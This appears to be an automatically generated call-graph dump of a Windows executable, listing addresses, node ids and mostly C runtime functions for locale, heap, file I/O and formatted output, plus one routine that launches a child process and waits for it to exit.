7814 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 7813->7814 7815 40477d 7814->7815 7816 4047a6 7815->7816 7817 404788 GetOEMCP 7815->7817 7818 4047ab GetACP 7816->7818 7819 404798 7816->7819 7817->7819 7818->7819 7819->7790 7819->7792 7821 404769 getSystemCP 79 API calls 7820->7821 7822 404805 7821->7822 7823 404810 setSBCS 7822->7823 7826 404854 IsValidCodePage 7822->7826 7828 404879 _memset __setmbcp_nolock 7822->7828 7824 401ee2 setSBUpLow 5 API calls 7823->7824 7825 4049c8 7824->7825 7825->7795 7825->7796 7826->7823 7827 404866 GetCPInfo 7826->7827 7827->7823 7827->7828 7833 404532 GetCPInfo 7828->7833 7966 403e1f LeaveCriticalSection 7830->7966 7832 404b32 7832->7792 7834 404618 7833->7834 7837 404566 _memset 7833->7837 7839 401ee2 setSBUpLow 5 API calls 7834->7839 7843 408b4c 7837->7843 7841 4046c3 7839->7841 7841->7828 7842 40894d ___crtLCMapStringA 102 API calls 7842->7834 7844 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 7843->7844 7845 408b5f 7844->7845 7853 408992 7845->7853 7848 40894d 7849 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 7848->7849 7850 408960 7849->7850 7919 4085a8 7850->7919 7854 4089b3 GetStringTypeW 7853->7854 7855 4089de 7853->7855 7857 4089d3 GetLastError 7854->7857 7858 4089cb 7854->7858 7856 408ac5 7855->7856 7855->7858 7881 40a82a GetLocaleInfoA 7856->7881 7857->7855 7859 408a17 MultiByteToWideChar 7858->7859 7876 408abf 7858->7876 7866 408a44 7859->7866 7859->7876 7861 401ee2 setSBUpLow 5 API calls 7864 4045d3 7861->7864 7863 408a59 _memset __crtCompareStringA_stat 7869 408a92 MultiByteToWideChar 7863->7869 7863->7876 7864->7848 7865 408b16 GetStringTypeA 7870 408b31 7865->7870 7865->7876 7866->7863 7867 406ac2 _malloc 67 API calls 7866->7867 7867->7863 7872 408aa8 GetStringTypeW 7869->7872 7873 408ab9 7869->7873 7874 403abd __freea 67 API calls 7870->7874 7872->7873 7877 408588 7873->7877 7874->7876 7876->7861 7878 408594 7877->7878 7879 4085a5 7877->7879 7878->7879 7880 403abd __freea 67 API calls 7878->7880 7879->7876 7880->7879 7882 40a858 7881->7882 7883 40a85d 7881->7883 7885 401ee2 setSBUpLow 5 API calls 7882->7885 7912 40abc6 7883->7912 7886 408ae9 7885->7886 7886->7865 7886->7876 7887 40a873 7886->7887 7888 40a8b3 GetCPInfo 7887->7888 7892 40a93d 7887->7892 7889 40a928 MultiByteToWideChar 7888->7889 7890 40a8ca 7888->7890 7889->7892 7896 40a8e3 _strlen 7889->7896 7890->7889 7893 40a8d0 GetCPInfo 7890->7893 7891 401ee2 setSBUpLow 5 API calls 7894 408b0a 7891->7894 7892->7891 7893->7889 7895 40a8dd 7893->7895 7894->7865 7894->7876 7895->7889 7895->7896 7897 40a915 _memset __crtCompareStringA_stat 7896->7897 7898 406ac2 _malloc 67 API calls 7896->7898 7897->7892 7899 40a972 MultiByteToWideChar 7897->7899 7898->7897 7900 40a98a 7899->7900 7904 40a9a9 7899->7904 7902 40a991 WideCharToMultiByte 7900->7902 7903 40a9ae 7900->7903 7901 408588 __freea 67 API calls 7901->7892 7902->7904 7905 40a9b9 WideCharToMultiByte 7903->7905 7906 40a9cd 7903->7906 7904->7901 7905->7904 7905->7906 7907 4039d1 __calloc_crt 67 API calls 7906->7907 7908 40a9d5 7907->7908 7908->7904 7909 40a9de WideCharToMultiByte 7908->7909 7909->7904 7910 40a9f0 7909->7910 7911 403abd __freea 67 API calls 7910->7911 7911->7904 7915 409ce6 7912->7915 7916 409cff 7915->7916 7917 409ab7 strtoxl 91 API calls 7916->7917 7918 409d0c 7917->7918 7918->7882 7920 4085c9 LCMapStringW 7919->7920 7924 4085e4 7919->7924 7921 4085ec GetLastError 7920->7921 7920->7924 7921->7924 7922 4087e2 7926 40a82a ___ansicp 91 API calls 7922->7926 7923 40863e 7925 408657 MultiByteToWideChar 7923->7925 7946 4087d9 7923->7946 7924->7922 7924->7923 7934 408684 7925->7934 7925->7946 7928 40880a 7926->7928 7927 401ee2 setSBUpLow 5 API calls 7929 4045f3 7927->7929 7930 408823 7928->7930 7931 4088fe LCMapStringA 7928->7931 7928->7946 7929->7842 7932 40a873 ___convertcp 74 API calls 7930->7932 7965 40885a 7931->7965 7937 408835 7932->7937 7933 4086d5 MultiByteToWideChar 7938 4086ee LCMapStringW 7933->7938 7959 4087d0 7933->7959 7936 406ac2 _malloc 67 API calls 7934->7936 7943 40869d __crtCompareStringA_stat 7934->7943 7935 408925 7945 403abd __freea 67 API calls 7935->7945 7935->7946 7936->7943 7940 40883f LCMapStringA 7937->7940 7937->7946 7942 40870f 7938->7942 7938->7959 7939 403abd __freea 67 API calls 7939->7935 7950 408861 7940->7950 7940->7965 7941 408588 __freea 67 API calls 7941->7946 7944 408718 7942->7944 7948 408741 7942->7948 7943->7933 7943->7946 7947 40872a LCMapStringW 7944->7947 7944->7959 7945->7946 7946->7927 7947->7959 7952 406ac2 _malloc 67 API calls 7948->7952 7962 40875c __crtCompareStringA_stat 7948->7962 7949 408872 _memset __crtCompareStringA_stat 7956 4088b0 LCMapStringA 7949->7956 7949->7965 7950->7949 7953 406ac2 _malloc 67 API calls 7950->7953 7951 408790 LCMapStringW 7954 4087ca 7951->7954 7957 4087a8 WideCharToMultiByte 7951->7957 7952->7962 7953->7949 7955 408588 __freea 67 API calls 7954->7955 7955->7959 7960 4088d0 7956->7960 7961 4088cc 7956->7961 7957->7954 7959->7941 7963 40a873 ___convertcp 74 API calls 7960->7963 7964 408588 __freea 67 API calls 7961->7964 7962->7951 7962->7959 7963->7961 7964->7965 7965->7935 7965->7939 7966->7832 7968 4059d4 7967->7968 7969 404ea7 __encode_pointer 6 API calls 7968->7969 7970 4059ec 7968->7970 7969->7968 7970->7125 7974 40592f 7971->7974 7973 405978 7973->7127 7975 40593b ___lock_fhandle 7974->7975 7982 4021d0 7975->7982 7981 40595c ___lock_fhandle 7981->7973 7983 403ef9 __lock 67 API calls 7982->7983 7984 4021d7 7983->7984 7985 405844 7984->7985 7986 404f22 __decode_pointer 6 API calls 7985->7986 7987 405858 7986->7987 7988 404f22 __decode_pointer 6 API calls 7987->7988 7989 405868 7988->7989 7990 4058eb 7989->7990 8005 4097bb 7989->8005 8002 405965 7990->8002 7992 404ea7 __encode_pointer 6 API calls 7993 4058e0 7992->7993 7995 404ea7 __encode_pointer 6 API calls 7993->7995 7994 405886 7997 4058aa 7994->7997 8001 4058d2 7994->8001 8018 403a1d 7994->8018 7995->7990 7997->7990 7998 403a1d __realloc_crt 73 API calls 7997->7998 7999 4058c0 7997->7999 7998->7999 7999->7990 8000 404ea7 __encode_pointer 6 API calls 7999->8000 8000->8001 8001->7992 8067 4021d9 8002->8067 8006 4097c7 ___lock_fhandle 8005->8006 8007 4097f4 8006->8007 8008 4097d7 8006->8008 8010 409835 HeapSize 8007->8010 8012 403ef9 __lock 67 API calls 8007->8012 8009 403750 __read 67 API calls 8008->8009 8011 4097dc 8009->8011 8014 4097ec ___lock_fhandle 8010->8014 8013 4036e8 __read 6 API calls 8011->8013 8015 409804 ___sbh_find_block 8012->8015 8013->8014 8014->7994 8023 409855 8015->8023 8021 403a26 8018->8021 8020 403a65 8020->7997 8021->8020 8022 403a46 Sleep 8021->8022 8027 406b8c 8021->8027 8022->8021 8026 403e1f LeaveCriticalSection 8023->8026 8025 409830 8025->8010 8025->8014 8026->8025 8028 406b98 ___lock_fhandle 8027->8028 8029 406bad 8028->8029 8030 406b9f 8028->8030 8032 406bc0 8029->8032 8033 406bb4 8029->8033 8031 406ac2 _malloc 67 API calls 8030->8031 8049 406ba7 ___lock_fhandle _realloc 8031->8049 8039 406d32 8032->8039 8061 406bcd ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 8032->8061 8034 403abd __freea 67 API calls 8033->8034 8034->8049 8035 406d65 8037 405f96 __calloc_impl 6 API calls 8035->8037 8036 406d37 HeapReAlloc 8036->8039 8036->8049 8040 406d6b 8037->8040 8038 403ef9 __lock 67 API calls 8038->8061 8039->8035 8039->8036 8041 406d89 8039->8041 8043 405f96 __calloc_impl 6 API calls 8039->8043 8045 406d7f 8039->8045 8042 403750 __read 67 API calls 8040->8042 8044 403750 __read 67 API calls 8041->8044 8041->8049 8042->8049 8043->8039 8046 406d92 GetLastError 8044->8046 8048 403750 __read 67 API calls 8045->8048 8046->8049 8051 406d00 8048->8051 8049->8021 8050 406c58 HeapAlloc 8050->8061 8051->8049 8052 406d05 GetLastError 8051->8052 8052->8049 8053 406cad HeapReAlloc 8053->8061 8054 407601 ___sbh_alloc_block 5 API calls 8054->8061 8055 406d18 8055->8049 8057 403750 __read 67 API calls 8055->8057 8056 405f96 __calloc_impl 6 API calls 8056->8061 8059 406d25 8057->8059 8058 406cfb 8060 403750 __read 67 API calls 8058->8060 8059->8046 8059->8049 8060->8051 8061->8035 8061->8038 8061->8049 8061->8050 8061->8053 8061->8054 8061->8055 8061->8056 8061->8058 8062 406e52 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 8061->8062 8063 406cd0 8061->8063 8062->8061 8066 403e1f LeaveCriticalSection 8063->8066 8065 406cd7 8065->8061 8066->8065 8070 403e1f LeaveCriticalSection 8067->8070 8069 4021e0 8069->7981 8070->8069 8072 401518 8071->8072 8113 40ca21 8072->8113 8074 40157f 8075 401589 __stbuf 8074->8075 8076 4015bd 8074->8076 8126 4017ca 8075->8126 8149 40c205 8076->8149 8078 4015d1 8179 40a121 8078->8179 8081 4015a1 8082 401ee2 setSBUpLow 5 API calls 8081->8082 8083 4015b6 8082->8083 8083->7136 8084 4015de _strncmp 8202 4011f0 8084->8202 8092 401686 __stbuf 8094 4017ca _fprintf 105 API calls 8092->8094 8093 4016ba 8096 4016ea 8093->8096 8099 401000 67 API calls 8093->8099 8095 401757 8094->8095 8097 401ee2 setSBUpLow 5 API calls 8095->8097 8098 401000 67 API calls 8096->8098 8100 40176f 8097->8100 8101 4016f4 8098->8101 8099->8093 8100->7136 8102 40171f 8101->8102 8103 401000 67 API calls 8101->8103 8104 401731 8102->8104 8105 401776 8102->8105 8103->8101 8238 40bbf4 8104->8238 8247 401410 8105->8247 8110 401790 8111 401ee2 setSBUpLow 5 API calls 8110->8111 8112 4017a3 8111->8112 8112->7136 8114 40ca2d ___lock_fhandle 8113->8114 8115 40ca42 8114->8115 8116 40ca5f 8114->8116 8117 403750 __read 67 API calls 8115->8117 8263 40c302 8116->8263 8120 40ca47 8117->8120 8122 4036e8 __read 6 API calls 8120->8122 8125 40ca57 ___lock_fhandle 8122->8125 8124 403750 __read 67 API calls 8124->8125 8125->8074 8127 4017d6 ___lock_fhandle 8126->8127 8128 4017e9 8127->8128 8130 401815 8127->8130 8129 403750 __read 67 API calls 8128->8129 8131 4017ee 8129->8131 8585 4019bd 8130->8585 8133 4036e8 __read 6 API calls 8131->8133 8141 4017fe ___lock_fhandle 8133->8141 8135 401898 8137 4018c4 8135->8137 8597 40261d 8135->8597 8628 4018dc 8137->8628 8141->8081 8146 403750 __read 67 API calls 8147 401888 8146->8147 8148 4036e8 __read 6 API calls 8147->8148 8148->8135 8150 40c211 ___lock_fhandle 8149->8150 8151 40c234 8150->8151 8152 40c219 8150->8152 8153 40c242 8151->8153 8159 40c283 8151->8159 8154 403763 __read 67 API calls 8152->8154 8156 403763 __read 67 API calls 8153->8156 8155 40c21e 8154->8155 8157 403750 __read 67 API calls 8155->8157 8158 40c247 8156->8158 8169 40c226 ___lock_fhandle 8157->8169 8162 403750 __read 67 API calls 8158->8162 8160 40c290 8159->8160 8161 40c2a4 8159->8161 8163 403763 __read 67 API calls 8160->8163 8164 40a5c9 ___lock_fhandle 68 API calls 8161->8164 8165 40c24e 8162->8165 8166 40c295 8163->8166 8167 40c2aa 8164->8167 8172 4036e8 __read 6 API calls 8165->8172 8168 403750 __read 67 API calls 8166->8168 8170 40c2b7 8167->8170 8171 40c2cd 8167->8171 8168->8165 8169->8078 8644 40bc43 8170->8644 8174 403750 __read 67 API calls 8171->8174 8172->8169 8176 40c2d2 8174->8176 8175 40c2c5 8708 40c2f8 8175->8708 8177 403763 __read 67 API calls 8176->8177 8177->8175 8180 40a12d ___lock_fhandle 8179->8180 8181 40a150 8180->8181 8182 40a135 8180->8182 8184 40a15e 8181->8184 8187 40a19f 8181->8187 8183 403763 __read 67 API calls 8182->8183 8185 40a13a 8183->8185 8186 403763 __read 67 API calls 8184->8186 8188 403750 __read 67 API calls 8185->8188 8189 40a163 8186->8189 8190 40a5c9 ___lock_fhandle 68 API calls 8187->8190 8200 40a142 ___lock_fhandle 8188->8200 8191 403750 __read 67 API calls 8189->8191 8192 40a1a5 8190->8192 8193 40a16a 8191->8193 8194 40a1c0 8192->8194 8195 40a1b2 8192->8195 8196 4036e8 __read 6 API calls 8193->8196 8198 403750 __read 67 API calls 8194->8198 8197 40a085 __close_nolock 70 API calls 8195->8197 8196->8200 8199 40a1ba 8197->8199 8198->8199 8712 40a1e4 8199->8712 8200->8084 8203 401200 8202->8203 8203->8203 8204 401a9b _calloc 67 API calls 8203->8204 8205 401211 8204->8205 8716 401fc9 8205->8716 8207 40122f 8208 401fc9 91 API calls 8207->8208 8211 401248 _memset 8207->8211 8208->8207 8209 401fc9 91 API calls 8209->8211 8210 401312 8212 4010a0 8210->8212 8211->8209 8211->8210 8213 4010cc 8212->8213 8733 401e96 8213->8733 8216 4011b1 8218 401a9b _calloc 67 API calls 8216->8218 8217 401118 8219 401e96 __wsplitpath 77 API calls 8217->8219 8226 401197 _strncpy 8218->8226 8220 401138 8219->8220 8736 401c84 8220->8736 8221 401ee2 setSBUpLow 5 API calls 8222 4011e0 8221->8222 8222->8092 8227 401a9b 8222->8227 8225 401a9b _calloc 67 API calls 8225->8226 8226->8221 8228 403f2c __calloc_impl 67 API calls 8227->8228 8229 401ab5 8228->8229 8230 403750 __read 67 API calls 8229->8230 8233 4016ae 8229->8233 8231 401ac8 8230->8231 8232 403750 __read 67 API calls 8231->8232 8231->8233 8232->8233 8234 401000 8233->8234 8235 401008 8234->8235 8235->8235 8236 401a9b _calloc 67 API calls 8235->8236 8237 401023 _memset 8236->8237 8237->8093 8239 40bc03 8238->8239 8241 40bc20 8238->8241 8240 403750 __read 67 API calls 8239->8240 8242 40bc08 8240->8242 8241->8239 8245 40bc35 8241->8245 8243 4036e8 __read 6 API calls 8242->8243 8244 40bc18 8243->8244 8244->8092 8825 40cb50 8245->8825 8248 401420 8247->8248 8248->8248 8249 401a9b _calloc 67 API calls 8248->8249 8250 40146e 8249->8250 9193 401ff7 8250->9193 8252 4014d2 8255 401350 8252->8255 8253 40147c 8253->8252 8254 401ff7 _sprintf 103 API calls 8253->8254 8254->8253 8256 401ae0 _memset 8255->8256 8257 40137a SetConsoleCtrlHandler CreateProcessA 8256->8257 8258 4013d5 WaitForSingleObject GetExitCodeProcess 8257->8258 8260 4013b9 __stbuf 8257->8260 8259 401406 8258->8259 8258->8260 8259->8110 8261 4017ca _fprintf 105 API calls 8260->8261 8262 4013cc 8261->8262 8262->8110 8264 40c327 8263->8264 8330 40d052 8264->8330 8267 40c348 8268 4035c0 __invoke_watson 10 API calls 8267->8268 8269 40c352 8268->8269 8274 40c355 8269->8274 8270 40c38b 8354 403763 8270->8354 8273 403750 __read 67 API calls 8275 40c39a 8273->8275 8274->8270 8277 40c44b 8274->8277 8276 4036e8 __read 6 API calls 8275->8276 8301 40c3a9 8276->8301 8336 40a690 8277->8336 8279 40c4ed 8280 40c4f4 8279->8280 8281 40c50e CreateFileA 8279->8281 8282 403763 __read 67 API calls 8280->8282 8283 40c5a8 GetFileType 8281->8283 8284 40c53b 8281->8284 8287 40c4f9 8282->8287 8285 40c5b5 GetLastError 8283->8285 8286 40c5f9 8283->8286 8288 40c574 GetLastError 8284->8288 8291 40c54f CreateFileA 8284->8291 8289 403776 __dosmaperr 67 API calls 8285->8289 8362 40a44b 8286->8362 8290 403750 __read 67 API calls 8287->8290 8357 403776 8288->8357 8293 40c5de CloseHandle 8289->8293 8294 40c503 8290->8294 8291->8283 8291->8288 8293->8294 8295 40c5ec 8293->8295 8299 403750 __read 67 API calls 8294->8299 8297 403750 __read 67 API calls 8295->8297 8300 40c5f1 8297->8300 8299->8301 8300->8294 8326 40ca9d 8301->8326 8302 40c91c 8302->8301 8305 40c9a4 CloseHandle CreateFileA 8302->8305 8303 40c671 8371 40cf21 8303->8371 8308 40c8ac 8305->8308 8309 40c9cf GetLastError 8305->8309 8307 40c6e2 8307->8302 8318 40c68d 8307->8318 8427 40810c 8307->8427 8308->8301 8310 403776 __dosmaperr 67 API calls 8309->8310 8313 40c9db 8310->8313 8311 403763 __read 67 API calls 8311->8318 8312 40bc43 77 API calls __read_nolock 8312->8318 8452 40a4cc 8313->8452 8318->8307 8318->8312 8319 409420 69 API calls __lseeki64_nolock 8318->8319 8320 40c89f 8318->8320 8321 40cf21 69 API calls __lseek_nolock 8318->8321 8323 40c837 8318->8323 8381 40a085 8318->8381 8396 40cd6b 8318->8396 8319->8318 8322 40a085 __close_nolock 70 API calls 8320->8322 8321->8318 8324 40c8a6 8322->8324 8323->8302 8325 403750 __read 67 API calls 8324->8325 8325->8308 8327 40caa2 8326->8327 8328 40ca8b 8326->8328 8584 40a669 LeaveCriticalSection 8327->8584 8328->8124 8328->8125 8331 40d061 8330->8331 8332 40c343 8330->8332 8333 403750 __read 67 API calls 8331->8333 8332->8267 8332->8274 8334 40d066 8333->8334 8335 4036e8 __read 6 API calls 8334->8335 8335->8332 8337 40a69c ___lock_fhandle 8336->8337 8338 403e36 __mtinitlocknum 67 API calls 8337->8338 8339 40a6ac 8338->8339 8340 403ef9 __lock 67 API calls 8339->8340 8341 40a6b1 ___lock_fhandle 8339->8341 8351 40a6c0 8340->8351 8341->8279 8342 40a803 8474 40a821 8342->8474 8343 40a799 8345 4039d1 __calloc_crt 67 API calls 8343->8345 8348 40a7a2 8345->8348 8346 40a741 EnterCriticalSection 8349 40a751 LeaveCriticalSection 8346->8349 8346->8351 8347 403ef9 __lock 67 API calls 8347->8351 8348->8342 8464 40a5c9 8348->8464 8349->8351 8351->8342 8351->8343 8351->8346 8351->8347 8353 405f27 ___lock_fhandle InitializeCriticalSectionAndSpinCount 8351->8353 8461 40a763 8351->8461 8353->8351 8355 4050f5 __getptd_noexit 67 API calls 8354->8355 8356 403768 8355->8356 8356->8273 8358 403763 __read 67 API calls 8357->8358 8359 403781 _realloc 8358->8359 8360 403750 __read 67 API calls 8359->8360 8361 403794 8360->8361 8361->8294 8363 40a4b2 8362->8363 8364 40a459 8362->8364 8365 403750 __read 67 API calls 8363->8365 8364->8363 8370 40a47d 8364->8370 8366 40a4b7 8365->8366 8368 403763 __read 67 API calls 8366->8368 8367 40a4a8 8367->8302 8367->8303 8367->8307 8368->8367 8369 40a4a2 SetStdHandle 8369->8367 8370->8367 8370->8369 8483 40a552 8371->8483 8373 40cf30 8374 40cf46 SetFilePointer 8373->8374 8375 40cf36 8373->8375 8377 40cf65 8374->8377 8378 40cf5d GetLastError 8374->8378 8376 403750 __read 67 API calls 8375->8376 8380 40c67e 8376->8380 8379 403776 __dosmaperr 67 API calls 8377->8379 8377->8380 8378->8377 8379->8380 8380->8311 8380->8318 8382 40a552 __lseeki64_nolock 67 API calls 8381->8382 8384 40a095 8382->8384 8383 40a0eb 8386 40a4cc __free_osfhnd 68 API calls 8383->8386 8384->8383 8385 40a0c9 8384->8385 8387 40a552 __lseeki64_nolock 67 API calls 8384->8387 8385->8383 8388 40a552 __lseeki64_nolock 67 API calls 8385->8388 8389 40a0f3 8386->8389 8391 40a0c0 8387->8391 8392 40a0d5 CloseHandle 8388->8392 8390 40a115 8389->8390 8393 403776 __dosmaperr 67 API calls 8389->8393 8390->8318 8394 40a552 __lseeki64_nolock 67 API calls 8391->8394 8392->8383 8395 40a0e1 GetLastError 8392->8395 8393->8390 8394->8385 8395->8383 8496 409420 8396->8496 8399 40cded 8400 403750 __read 67 API calls 8399->8400 8402 40cdf8 8399->8402 8400->8402 8401 409420 __lseeki64_nolock 69 API calls 8404 40cda6 8401->8404 8402->8318 8403 40ce88 8409 409420 __lseeki64_nolock 69 API calls 8403->8409 8424 40cef1 8403->8424 8404->8399 8404->8403 8405 40cdcc GetProcessHeap HeapAlloc 8404->8405 8407 40cde8 8405->8407 8412 40cdff __setmode_nolock 8405->8412 8406 409420 __lseeki64_nolock 69 API calls 8406->8399 8408 403750 __read 67 API calls 8407->8408 8408->8399 8410 40cea1 8409->8410 8410->8399 8411 40a552 __lseeki64_nolock 67 API calls 8410->8411 8413 40ceb7 SetEndOfFile 8411->8413 8417 40ce6b 8412->8417 8421 40ce42 __setmode_nolock 8412->8421 8506 4079d9 8412->8506 8415 40ced4 8413->8415 8413->8424 8416 403750 __read 67 API calls 8415->8416 8418 40ced9 8416->8418 8419 403763 __read 67 API calls 8417->8419 8420 403763 __read 67 API calls 8418->8420 8422 40ce70 8419->8422 8423 40cee4 GetLastError 8420->8423 8425 40ce50 GetProcessHeap HeapFree 8421->8425 8422->8421 8426 403750 __read 67 API calls 8422->8426 8423->8424 8424->8399 8424->8406 8425->8424 8426->8421 8428 408118 ___lock_fhandle 8427->8428 8429 408120 8428->8429 8430 40813b 8428->8430 8431 403763 __read 67 API calls 8429->8431 8432 408149 8430->8432 8435 40818a 8430->8435 8433 408125 8431->8433 8434 403763 __read 67 API calls 8432->8434 8436 403750 __read 67 API calls 8433->8436 8437 40814e 8434->8437 8438 40a5c9 ___lock_fhandle 68 API calls 8435->8438 8445 40812d ___lock_fhandle 8436->8445 8439 403750 __read 67 API calls 8437->8439 8440 408190 8438->8440 8441 408155 8439->8441 8443 4081b3 8440->8443 8444 40819d 8440->8444 8442 4036e8 __read 6 API calls 8441->8442 8442->8445 8447 403750 __read 67 API calls 8443->8447 8446 4079d9 __write_nolock 99 API calls 8444->8446 8445->8307 8448 4081ab 8446->8448 8449 4081b8 8447->8449 8580 4081de 8448->8580 8450 403763 __read 67 API calls 8449->8450 8450->8448 8453 40a538 8452->8453 8454 40a4dd 8452->8454 8455 403750 __read 67 API calls 8453->8455 8454->8453 8459 40a508 8454->8459 8456 40a53d 8455->8456 8457 403763 __read 67 API calls 8456->8457 8458 40a52e 8457->8458 8458->8308 8459->8458 8460 40a528 SetStdHandle 8459->8460 8460->8458 8477 403e1f LeaveCriticalSection 8461->8477 8463 40a76a 8463->8351 8465 40a5d5 ___lock_fhandle 8464->8465 8466 40a630 8465->8466 8469 403ef9 __lock 67 API calls 8465->8469 8467 40a652 ___lock_fhandle 8466->8467 8468 40a635 EnterCriticalSection 8466->8468 8467->8342 8468->8467 8470 40a601 8469->8470 8471 40a618 8470->8471 8472 405f27 ___lock_fhandle InitializeCriticalSectionAndSpinCount 8470->8472 8478 40a660 8471->8478 8472->8471 8482 403e1f LeaveCriticalSection 8474->8482 8476 40a828 8476->8341 8477->8463 8481 403e1f LeaveCriticalSection 8478->8481 8480 40a667 8480->8466 8481->8480 8482->8476 8484 40a55f 8483->8484 8487 40a577 8483->8487 8485 403763 __read 67 API calls 8484->8485 8486 40a564 8485->8486 8489 403750 __read 67 API calls 8486->8489 8488 403763 __read 67 API calls 8487->8488 8490 40a5bc 8487->8490 8491 40a5a5 8488->8491 8492 40a56c 8489->8492 8490->8373 8493 403750 __read 67 API calls 8491->8493 8492->8373 8494 40a5ac 8493->8494 8495 4036e8 __read 6 API calls 8494->8495 8495->8490 8497 40a552 __lseeki64_nolock 67 API calls 8496->8497 8498 40943e 8497->8498 8499 409446 8498->8499 8500 409457 SetFilePointer 8498->8500 8501 403750 __read 67 API calls 8499->8501 8502 40946f GetLastError 8500->8502 8504 40944b 8500->8504 8501->8504 8503 409479 8502->8503 8502->8504 8505 403776 __dosmaperr 67 API calls 8503->8505 8504->8399 8504->8401 8505->8504 8507 4079e8 __write_nolock 8506->8507 8508 407a41 8507->8508 8509 407a1a 8507->8509 8539 407a0f 8507->8539 8512 407aa9 8508->8512 8513 407a83 8508->8513 8511 403763 __read 67 API calls 8509->8511 8510 401ee2 setSBUpLow 5 API calls 8514 40810a 8510->8514 8515 407a1f 8511->8515 8517 407abd 8512->8517 8521 409420 __lseeki64_nolock 69 API calls 8512->8521 8516 403763 __read 67 API calls 8513->8516 8514->8412 8518 403750 __read 67 API calls 8515->8518 8520 407a88 8516->8520 8565 40659d 8517->8565 8522 407a26 8518->8522 8525 403750 __read 67 API calls 8520->8525 8521->8517 8523 4036e8 __read 6 API calls 8522->8523 8523->8539 8524 407ac8 8526 407d6e 8524->8526 8531 40516e __getptd 67 API calls 8524->8531 8527 407a91 8525->8527 8529 40803d WriteFile 8526->8529 8530 407d7e 8526->8530 8528 4036e8 __read 6 API calls 8527->8528 8528->8539 8534 408070 GetLastError 8529->8534 8535 407d50 8529->8535 8532 407e5c 8530->8532 8555 407d92 8530->8555 8533 407ae3 GetConsoleMode 8531->8533 8554 407f3c 8532->8554 8557 407e6b 8532->8557 8533->8526 8537 407b0e 8533->8537 8534->8535 8536 4080bb 8535->8536 8535->8539 8540 40808e 8535->8540 8536->8539 8541 403750 __read 67 API calls 8536->8541 8537->8526 8538 407b20 GetConsoleCP 8537->8538 8538->8535 8563 407b43 8538->8563 8539->8510 8543 408099 8540->8543 8544 4080ad 8540->8544 8546 4080de 8541->8546 8542 407fa2 WideCharToMultiByte 8542->8534 8549 407fd9 WriteFile 8542->8549 8548 403750 __read 67 API calls 8543->8548 8551 403776 __dosmaperr 67 API calls 8544->8551 8545 407e00 WriteFile 8545->8534 8545->8555 8547 403763 __read 67 API calls 8546->8547 8547->8539 8552 40809e 8548->8552 8553 408010 GetLastError 8549->8553 8549->8554 8550 407ee0 WriteFile 8550->8534 8550->8557 8551->8539 8556 403763 __read 67 API calls 8552->8556 8553->8554 8554->8535 8554->8536 8554->8542 8554->8549 8555->8535 8555->8536 8555->8545 8556->8539 8557->8535 8557->8536 8557->8550 8559 407bef WideCharToMultiByte 8559->8535 8561 407c20 WriteFile 8559->8561 8560 40a3fb 79 API calls __fassign 8560->8563 8561->8534 8561->8563 8562 40a21f 11 API calls __putwch_nolock 8562->8563 8563->8534 8563->8535 8563->8559 8563->8560 8563->8562 8564 407c74 WriteFile 8563->8564 8574 40686c 8563->8574 8564->8534 8564->8563 8566 4065b9 8565->8566 8567 4065aa 8565->8567 8569 4065dd 8566->8569 8570 403750 __read 67 API calls 8566->8570 8568 403750 __read 67 API calls 8567->8568 8571 4065af 8568->8571 8569->8524 8572 4065cd 8570->8572 8571->8524 8573 4036e8 __read 6 API calls 8572->8573 8573->8569 8577 406834 8574->8577 8578 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8577->8578 8579 406847 8578->8579 8579->8563 8583 40a669 LeaveCriticalSection 8580->8583 8582 4081e6 8582->8445 8583->8582 8584->8328 8586 4019f1 EnterCriticalSection 8585->8586 8587 4019cf 8585->8587 8588 40181e 8586->8588 8587->8586 8589 4019d7 8587->8589 8588->8135 8591 40357f 8588->8591 8590 403ef9 __lock 67 API calls 8589->8590 8590->8588 8592 40182e 8591->8592 8593 40358e 8591->8593 8592->8135 8592->8146 8594 403750 __read 67 API calls 8593->8594 8595 403593 8594->8595 8596 4036e8 __read 6 API calls 8595->8596 8596->8592 8598 40357f __fileno 67 API calls 8597->8598 8599 40262c 8598->8599 8600 40659d __stbuf 67 API calls 8599->8600 8602 402632 __stbuf 8600->8602 8601 4018aa 8604 402793 8601->8604 8602->8601 8603 40398c __malloc_crt 67 API calls 8602->8603 8603->8601 8605 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8604->8605 8606 4027fa 8605->8606 8607 4027fe 8606->8607 8610 40357f __fileno 67 API calls 8606->8610 8621 40283f __output_l __aulldvrm _strlen 8606->8621 8608 403750 __read 67 API calls 8607->8608 8609 402803 8608->8609 8611 4036e8 __read 6 API calls 8609->8611 8610->8621 8612 402815 8611->8612 8613 401ee2 setSBUpLow 5 API calls 8612->8613 8614 4018ba 8613->8614 8624 4026b9 8614->8624 8615 406834 __isleadbyte_l 77 API calls 8615->8621 8616 4026ed 101 API calls _write_multi_char 8616->8621 8617 403abd __freea 67 API calls 8617->8621 8618 404f22 6 API calls __decode_pointer 8618->8621 8619 406817 79 API calls __cftof 8619->8621 8620 40398c __malloc_crt 67 API calls 8620->8621 8621->8607 8621->8612 8621->8615 8621->8616 8621->8617 8621->8618 8621->8619 8621->8620 8622 402746 101 API calls _write_string 8621->8622 8623 402720 101 API calls _write_multi_char 8621->8623 8622->8621 8623->8621 8625 4026d7 8624->8625 8626 4026c4 8624->8626 8625->8137 8626->8625 8631 403bea 8626->8631 8637 401a30 8628->8637 8630 4018e4 8630->8141 8632 403c03 8631->8632 8636 403c25 8631->8636 8633 40357f __fileno 67 API calls 8632->8633 8632->8636 8634 403c1e 8633->8634 8635 40810c __locking 101 API calls 8634->8635 8635->8636 8636->8625 8638 401a60 LeaveCriticalSection 8637->8638 8639 401a41 8637->8639 8638->8630 8639->8638 8640 401a48 8639->8640 8643 403e1f LeaveCriticalSection 8640->8643 8642 401a5d 8642->8630 8643->8642 8645 40bc7a 8644->8645 8646 40bc5f 8644->8646 8648 40bc89 8645->8648 8650 40bcb0 8645->8650 8647 403763 __read 67 API calls 8646->8647 8649 40bc64 8647->8649 8651 403763 __read 67 API calls 8648->8651 8653 403750 __read 67 API calls 8649->8653 8652 40bccf 8650->8652 8666 40bce3 8650->8666 8654 40bc8e 8651->8654 8655 403763 __read 67 API calls 8652->8655 8667 40bc6c 8653->8667 8657 403750 __read 67 API calls 